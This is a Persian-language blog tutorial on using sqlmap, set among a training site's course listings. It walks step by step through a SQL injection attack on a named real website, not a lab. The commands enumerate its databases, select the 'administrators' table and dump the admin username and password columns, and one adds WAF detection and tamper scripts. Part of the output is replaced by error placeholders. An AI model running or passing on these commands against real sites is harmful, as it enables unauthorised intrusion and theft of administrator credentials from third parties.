درخواست های ارتباط
جستجو
    لیست دوستان من
    صندوق پیام
    همه را دیدم
    • در حال دریافت لیست پیام ها
    صندوق پیام
    رویدادها
    همه را دیدم
    • در حال دریافت لیست رویدادها
    همه رویدادهای من
    تخفیف های وب سایت
    همه تخفیف ها

    عضویت در

    کانال تلگرام

    توسینسو

    اطلاعات مطلب
      مدرس/نویسنده
      محمد ولی الهی
      امتیاز: 191
      رتبه:690
      0
      4
      0
      10
      دوره های مرتبط
      دوره های توسینسو دوره آموزشی بین المللی لینوکس LPIC 303 کد 328
      دوره آموزشی بین المللی لینوکس LPIC 303 کد 328
      مدرس: محمد عابدینی
      این دوره را در 18 قسط خریداری کنید
      دوره آموزشی راه اندازی ایمیل سرور iRedMail در OpenBSD
      دوره آموزشی راه اندازی ایمیل سرور iRedMail در OpenBSD
      مدرس: محمد عابدینی
      این دوره را در 2 قسط خریداری کنید
      دوره آموزشی مقدماتی BASH Scripting در لینوکس
      دوره آموزشی مقدماتی BASH Scripting در لینوکس
      مدرس: مجتبی اسمائی
      این دوره را در 10 قسط خریداری کنید
      دوره آموزشی راه اندازی سرویس های تحت شبکه در لینوکس CentOS
      دوره آموزشی راه اندازی سرویس های تحت شبکه در لینوکس CentOS
      مدرس: آرش حیدری
      این دوره را در 12 قسط خریداری کنید
      دوره آموزشی بین المللی لینوکس LPIC2 کد 201
      دوره آموزشی بین المللی لینوکس LPIC2 کد 201
      مدرس: محمد نصیری
      این دوره را در 27 قسط خریداری کنید
      دوره آموزشی بین المللی لینوکس LPIC1 کد 102
      دوره آموزشی بین المللی لینوکس LPIC1 کد 102
      مدرس: محمد نصیری
      این دوره را در 16 قسط خریداری کنید
      دوره اموزشي فوق تخصصي  سيستم عامل لينوكس RHCSA  قسمت اول
      دوره اموزشي فوق تخصصي سيستم عامل لينوكس RHCSA قسمت اول
      مدرس: علیرضا سیفی و هومن برازنده
      این دوره را در 10 قسط خریداری کنید
      دوره آموزشی فوق تخصصی Shell Scripting در BASH Shell
      دوره آموزشی فوق تخصصی Shell Scripting در BASH Shell
      مدرس: محمد عابدینی
      این دوره را در 19 قسط خریداری کنید
      دوره آموزشی بین المللی لینوکس LPIC1 کد 101
      دوره آموزشی بین المللی لینوکس LPIC1 کد 101
      مدرس: محمد نصیری
      این دوره را در 18 قسط خریداری کنید
      گام به گام تخصصی مدیریت و پیکربندی سرورها با Ansible در لینوکس
      گام به گام تخصصی مدیریت و پیکربندی سرورها با Ansible در لینوکس
      مدرس: مجتبی اسمائی
      این دوره را در 10 قسط خریداری کنید
      آموزش نصب سیستم عامل اندروید روی کامپیوترهای شخصی با Android PC
      آموزش نصب سیستم عامل اندروید روی کامپیوترهای شخصی با Android PC
      مدرس: محمد عابدینی
      این دوره را در 1 قسط خریداری کنید
      دوره آموزشی Linux Essentials = دریچه ورود شما به دنیای لینوکس
      دوره آموزشی Linux Essentials = دریچه ورود شما به دنیای لینوکس
      مدرس: محمد نصیری
      این دوره را در 17 قسط خریداری کنید
      دوره آموزشی رایگان نصب انواع لینوکس بصورت عادی و Dual Boot
      دوره آموزشی رایگان نصب انواع لینوکس بصورت عادی و Dual Boot
      مدرس: محمد عابدینی
      این دوره را در 4 قسط خریداری کنید
      دوره آموزشی بین المللی لینوکس LPIC2 کد 202
      دوره آموزشی بین المللی لینوکس LPIC2 کد 202
      مدرس: امیرحسین احمدی
      این دوره را در 29 قسط خریداری کنید
      دوره آموزشی کنترل پنل هاستینگ CWP
      دوره آموزشی کنترل پنل هاستینگ CWP
      مدرس: فربد رستم صولت
      این دوره را در 6 قسط خریداری کنید
      دوره آموزشی جامع CentOS Web Panel یا CWP
      دوره آموزشی جامع CentOS Web Panel یا CWP
      مدرس: کاظم تقندیکی
      این دوره را در 10 قسط خریداری کنید
      تاریخ 14 ماه قبل
      نظرات 0
      بازدیدها 199
      آموزش کار با sqlmap


      خب اول از همه‌ باید گفت که این برنامه در

      سیستم عامل لینوکس قرار دارد❗️❗️

      💢خب بریم سراغ آموزش💢

      اول Terminal رو باز میکنیم

      بعد در آن تایپ میکنیم sqlmap

      برنامه بالا میاد و میبنید که به صورت کامندی

      هستش❗️(متنی)

      خب ما یه تارگت داریم اول یه نکته درباره ی

      این تارگت بگم ...

      این تارگت پابلیک شده ...و چون صفحه که

      صفحه ادمین رو کسی نتونسته پیدا کنه

      همینجوری مونده📌

      Target: http://www.bible-history.com/subcat.php?id=2

      حالا باید دستور رو وارد کنیم.❗️توجه کنید❗️

      اول باید بنویسیم:

      sqlmap -u http://www.bible-history.com/subcat.php?id=2 --dbs

      در بالا -u به معنای url و --dbs به

      معنای دسترسی به دیتابیس هستش

      خب چیزهای پیچیده تر هم هست مثلا:

      sqlmap -u http://www.bible
      -history.com/subcat.php?id=2 —level 5 —risk 3 -v 3 —thread 10 —dbms=mysql —identify-waf —tamper between.py —random-agent —dbs —batch



      حالا چند تا کلمه مثلا :
      *] bible_glossary
      [*] bible_history
      [*] information_schema
      [*] keywords
      [*] kidsdict

      اینجا باید چیزهایی که به ادمین مربوط میشه

      رو انتخاب کرد (bible_history)

      خب نحوه وارد کردن دستورش چجوریه

      sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
      bible_history --tables

      حالا وقتی این دستور رو زدید یه سری چیزا

      مثل:
      Emails
      administrators
      | bh_addform
      ..........

      خب قطعا معلومه که باید کدوم رو انتخاب

      کنیم(administrators)

      خب حالا دستور بعدی چیه؟☹️

      sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
      bible_history -T administrators --columns

      و اینجا چیزهایی مثل :

      +------------------+-------------+

      متن دارای اشکال می باشد


      +------------------+-------------+

      متن دارای اشکال می باشد


      متن دارای اشکال می باشد


      متن دارای اشکال می باشد


      متن دارای اشکال می باشد


      متن دارای اشکال می باشد


      +------------------+-------------+

      میاره حالا شما دستور
      sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
      biblehistory -T administrators -C adminusername,admin_password --dump

      خب حالا میبینید که user و password

      سایت رو بهتون نشون میده
      برچسب ها
      مطالب مرتبط

      در حال دریافت اطلاعات

      نظرات
      هیچ نظری ارسال نشده است

        برای ارسال نظر ابتدا به سایت وارد شوید